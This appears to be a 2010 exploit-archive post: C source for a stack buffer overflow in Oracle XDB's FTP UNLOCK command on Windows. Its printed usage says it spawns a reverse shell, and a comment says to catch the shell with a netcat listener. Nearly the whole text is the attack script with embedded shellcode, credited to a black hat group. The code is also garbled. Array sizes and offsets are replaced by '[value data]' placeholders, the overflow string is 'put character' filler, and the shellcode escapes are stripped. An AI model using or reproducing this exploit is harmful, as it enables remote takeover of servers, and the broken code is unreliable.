Oracle XDB FTP service UNLOCK buffer overflow

2010-03-23
ID: 66939
CVE: None
Download vulnerable application: None
[+] vulnerabilities network level/stack based buffer overflow
[+] special network layer attack
[+] implemented over http/XML-db/ftp==>windows XDB
[+] connecting:8080
[=] operation: win 32-->xdb overflow
[+] author mc2_s3lector
[+] yogyacarderlink.web.id/KeDai Computerworks.com


exploit win32
#include <stdio.h>
#include <windows.h>
#include <winsock.h>
   
int GainControlOfOracle(char *, char *);
int StartWinsock(void);
int SetUpExploit(char *,int);
   
struct sockaddr_in s_sa;
struct hostent *he;
unsigned int addr;
char host[value data]="";
   
//register acces\
unsigned char exploit[value data]=
"x55x8BxECxEBx03x5BxEBx05xE8xF8xFFxFFxFFxBExFFxFF"
"xFFxFFx81xF6xDCxFExFFxFFx03xDEx33xC0x50x50x50x50"
"x50x50x50x50x50x50xFFxD3x50x68x61x72x79x41x68x4C"
"x69x62x72x68x4Cx6Fx61x64x54xFFx75xFCxFFx55xF4x89"
"x45xF0x83xC3x63x83xC3x5Dx33xC9xB1x4ExB2xFFx30x13"
"x83xEBx01xE2xF9x43x53xFFx75xFCxFFx55xF4x89x45xEC"
"x83xC3x10x53xFFx75xFCxFFx55xF4x89x45xE8x83xC3x0C"
"x53xFFx55xF0x89x45xF8x83xC3x0Cx53x50xFFx55xF4x89"
"x45xE4x83xC3x0Cx53xFFx75xF8xFFx55xF4x89x45xE0x83"
"xC3x0Cx53xFFx75xF8xFFx55xF4x89x45xDCx83xC3x08x89"
"x5DxD8x33xD2x66x83xC2x02x54x52xFFx55xE4x33xC0x33"
"xC9x66xB9x04x01x50xE2xFDx89x45xD4x89x45xD0xBFx0A"
"x01x01x26x89x7DxCCx40x40x89x45xC8x66xB8xFFxFFx66"
"x35xFFxCAx66x89x45xCAx6Ax01x6Ax02xFFx55xE0x89x45"
"xE0x6Ax10x8Dx75xC8x56x8Bx5DxE0x53xFFx55xDCx83xC0"
"x44x89x85x58xFFxFFxFFx83xC0x5Ex83xC0x5Ex89x45x84"
"x89x5Dx90x89x5Dx94x89x5Dx98x8DxBDx48xFFxFFxFFx57"
"x8DxBDx58xFFxFFxFFx57x33xC0x50x50x50x83xC0x01x50"
"x83xE8x01x50x50x8Bx5DxD8x53x50xFFx55xECxFFx55xE8"
"x60x33xD2x83xC2x30x64x8Bx02x8Bx40x0Cx8Bx70x1CxAD"
"x8Bx50x08x52x8BxC2x8BxF2x8BxDAx8BxCAx03x52x3Cx03"
"x42x78x03x58x1Cx51x6Ax1Fx59x41x03x34x08x59x03x48"
"x24x5Ax52x8BxFAx03x3Ex81x3Fx47x65x74x50x74x08x83"
"xC6x04x83xC1x02xEBxECx83xC7x04x81x3Fx72x6Fx63x41"
"x74x08x83xC6x04x83xC1x02xEBxD9x8BxFAx0FxB7x01x03"
"x3Cx83x89x7Cx24x44x8Bx3Cx24x89x7Cx24x4Cx5Fx61xC3"
"x90x90x90xBCx8Dx9Ax9Ex8Bx9AxAFx8Dx90x9Cx9Ax8Cx8C"
"xBExFFxFFxBAx87x96x8BxABx97x8Dx9Ax9Ex9BxFFxFFxA8"
"x8CxCDxA0xCCxCDxD1x9Bx93x93xFFxFFxA8xACxBExACx8B"
"x9Ex8Dx8Bx8Ax8FxFFxFFxA8xACxBExACx90x9Cx94x9Ax8B"
"xBExFFxFFx9Cx90x91x91x9Ax9Cx8BxFFx9Cx92x9BxFFxFF"
"xFFxFFxFFxFF";
   
char exploit_code[value data]=
"UNLOCK / put character"
"put character"
"put character"
"put character"
"put character"  --------->char or nummeric-----or combine chart&nummeric
"5eeefffggghhh";
   
char exception_handler[value dataX]="x79x9Bxf7x77";
char short_jump[value dataX]="xEBx06x90x90";
   

int main(int argc, char *argv[])
{
     
     if(argc != 6)
     {
          printf("nntOracle XDB FTP Service UNLOCK Buffer Overflow Exploit");
          printf("nntSpawns a reverse shell to specified port");
          printf("nntUsage:t%s host userid password ipaddress port",argv[0]);
          printf("nt6th maret 2010nnn");
          return 0;
     }
   
     strncpy(host,argv[1],250);
     if(StartWinsock()==0)
          return printf("Error starting Winsock.n");
   
     SetUpExploit(argv[4],atoi(argv[5]));
   
     strcat(exploit_code,short_jump);
     strcat(exploit_code,exception_handler);
     strcat(exploit_code,exploit);
     strcat(exploit_code,"rn");
   
     GainControlOfOracle(argv[2],argv[3]);
          
     return 0;
   
}          
   

int SetUpExploit(char *myip, int myport)--->protocol
{
     unsigned int ip=0;
     unsigned short prt=0;
     char *ipt="";
     char *prtt="";
   
     ip = inet_addr(myip);
   
     ipt = (char*)&ip;
     exploit[value data]=ipt[0];
     exploit[value data]=ipt[1];
     exploit[value data]=ipt[2];
     exploit[value data]=ipt[3];
   
     // set the TCP port to connect on
     // netcat should be listening on this port
     // e.g. nc -l -p 80
   
     prt = htons((unsigned short)myport);
     prt = prt ^ 0xFFFF;
     prtt = (char *) &prt;
     exploit[value data]=prtt[0];
     exploit[value data]=prtt[1];
   
     return 0;
}
   

int StartWinsock()
{
     int err=0;
     WORD wVersionRequested;
     WSADATA wsaData;
   
     wVersionRequested = MAKEWORD( 2, 0 );
     err = WSAStartup( wVersionRequested, &wsaData );
     if ( err != 0 )
          return 0;
     if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 )
       {
          WSACleanup( );
          return 0;
     }
   
     if (isalpha(host[0]))
     {
          he = gethostbyname(host);
          s_sa.sin_addr.s_addr=INADDR_ANY;
          s_sa.sin_family=AF_INET;
          memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
       }
     else
     {
          addr = inet_addr(host);
          s_sa.sin_addr.s_addr=INADDR_ANY;
          s_sa.sin_family=AF_INET;
          memcpy(&s_sa.sin_addr,&addr,4);
          he = (struct hostent *)1;
     }
   
     if (he == NULL)
       {
          return 0;
       }
     return 1;
}
   

   
int GainControlOfOracle(char *user, char *pass)
{
   
     char usercmd[value dataXX]="user ";
     char passcmd[value dataXX]="pass ";
     char resp[1600]="";
     int snd=0,rcv=0;
     struct sockaddr_in r_addr;
     SOCKET sock;
   

     strncat(usercmd,user,230);
     strcat(usercmd,"rn");
     strncat(passcmd,pass,230);
     strcat(passcmd,"rn");
   

     sock=socket(AF_INET,SOCK_STREAM,0);
     if (sock==INVALID_SOCKET)
         return printf(" sock error");
   
     r_addr.sin_family=AF_INET;
     r_addr.sin_addr.s_addr=INADDR_ANY;        
     r_addr.sin_port=htons((unsigned short)0);
     s_sa.sin_port=htons((unsigned short)2100);
   
     
     if (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR)
          return printf("Connect error");
   
     rcv = recv(sock,resp,1500,0);
     printf("%s",resp);
     ZeroMemory(resp,1600);
   
    snd=send(sock, usercmd , strlen(usercmd) , 0);
     rcv = recv(sock,resp,1500,0);
     printf("%s",resp);
     ZeroMemory(resp,1600);
   
    snd=send(sock, passcmd , strlen(passcmd) , 0);
     rcv = recv(sock,resp,1500,0);
     printf("%s",resp);
     if(resp[0]=='5')
     {
          closesocket(sock);
          return printf("Failed to log in using user %s and password 
%s.n",user,pass);
     }
     ZeroMemory(resp,1600);
   
     snd=send(sock, exploit_code, strlen(exploit_code) , 0);
   
     Sleep(2000);
   
     closesocket(sock);
     return 0;
}


big thank to;
================================================================================
indonesian black hat team(www.yogyacarderlink.web.id)
KeDaiComputerworks.com
Jasakom(jasakom.com)
indonesianhacker.org
Indesign COmputer Care (INDESIGN)
Indonesian hacker(indonesianhacker.org)
one-day(the-codec),n3r0,elpaciano
================================================================================
1-4-2 (www02)